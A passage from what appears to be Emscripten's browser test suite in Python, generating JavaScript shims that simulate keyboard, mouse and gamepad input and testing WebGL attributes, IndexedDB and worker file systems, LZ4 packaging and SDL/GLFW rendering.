event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keypress(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
def test_fflush(self):
return self.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'NO_EXIT_RUNTIME=0'];
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10;
secret2 = 'b' * 10;
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'): os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
import random
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024*128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024*128))
random_data = bytearray(random.randint(0,255) for x in range(1024*128*10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3*1024*128*10 + 1
assert os.stat('test.data').st_size < (3*1024*128*10)/2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def do_test_worker(self, args=[]):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["stderr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
